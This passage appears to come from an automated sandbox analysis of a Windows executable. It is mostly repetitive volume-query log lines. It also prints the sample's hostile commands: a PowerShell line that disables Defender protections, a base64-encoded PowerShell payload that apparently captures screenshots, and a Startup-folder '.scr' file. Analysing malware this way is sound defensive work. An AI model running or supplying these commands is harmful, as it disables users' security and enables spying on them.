acaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabgaoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaiaJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversendJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabgaoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaiab
              Source: C:\Users\user\AppData\Local\Temp\_MEI73082\rar.exeCode function: 83_2_00007FF64FE9B340 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,83_2_00007FF64FE9B340
              Source: C:\Users\user\Desktop\program.exeCode function: 0_2_00007FF6B7529570 cpuid 0_2_00007FF6B7529570
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73082\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73082\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73082\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73082\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73082\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73082\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73082\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73082\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73082\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73082\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\Desktop\program.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73082 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73082 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\Desktop\program.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73082\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73082 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73082 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73082\_ctypes.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73082 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\Desktop\program.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\Desktop\program.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\Desktop\program.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73082\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73082\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73082\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73082\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73082\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73082\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73082\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73082\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73082\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73082\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73082\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73082\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\Desktop\program.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\Desktop\program.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\Desktop\program.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73082\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73082\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\Desktop\program.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73082\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73082\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\Desktop\program.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\Desktop\program.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73082\blank.aes VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73082\blank.aes VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73082\blank.aes VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73082\blank.aes VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73082\blank.aes VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73082\blank.aes VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\Desktop\program.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73082 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73082\_lzma.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\Desktop\program.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73082\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73082\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\Desktop\program.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73082\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\Desktop\program.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73082\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73082 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\Desktop\program.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73082 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\Desktop\program.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\Desktop\program.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\Desktop\program.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\Desktop\program.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\Desktop\program.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\Desktop\program.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73082 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73082 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\Desktop\program.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73082 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73082\_bz2.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\Desktop\program.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73082 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\Desktop\program.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\Desktop\program.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73082 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73082\_sqlite3.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73082\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\Desktop\program.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\Desktop\program.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\Desktop\program.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\Desktop\program.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\Desktop\program.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73082 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\Desktop\program.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\Desktop\program.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73082 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73082\_socket.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\Desktop\program.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73082 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73082\select.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\Desktop\program.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73082 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\Desktop\program.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\Desktop\program.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\Desktop\program.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\Desktop\program.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\Desktop\program.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\Desktop\program.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\Desktop\program.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\Desktop\program.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\Desktop\program.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\Desktop\program.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\Desktop\program.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\Desktop\program.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73082 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\Desktop\program.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\Desktop\program.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\Desktop\program.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\Desktop\program.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\Desktop\program.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73082 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\Desktop\program.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\Desktop\program.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\Desktop\program.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\Desktop\program.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73082 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73082 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73082 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\Desktop\program.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\Desktop\program.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\Desktop\program.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\Desktop\program.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73082 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73082\_hashlib.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\Desktop\program.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\Desktop\program.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\Desktop\program.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\Desktop\program.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\Desktop\program.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\Desktop\program.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73082\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73082 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73082\_queue.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\Desktop\program.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\Desktop\program.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\Desktop\program.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\Desktop\program.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\Desktop\program.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73082 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73082 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73082 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\Desktop\program.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\Desktop\program.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73082 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\Desktop\program.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\Desktop\program.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73082 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\Desktop\program.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\Desktop\program.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73082 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73082 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73082 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\Desktop\program.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73082 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73082 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\Desktop\program.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\Desktop\program.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73082 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\Desktop\program.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\Desktop\program.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73082 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\Desktop\program.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\Desktop\program.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\Desktop\program.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\Desktop\program.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\Desktop\program.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\Desktop\program.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\Desktop\program.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\Desktop\program.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73082\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73082\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\Desktop\program.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\program.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73082 VolumeInformationJump to behavior
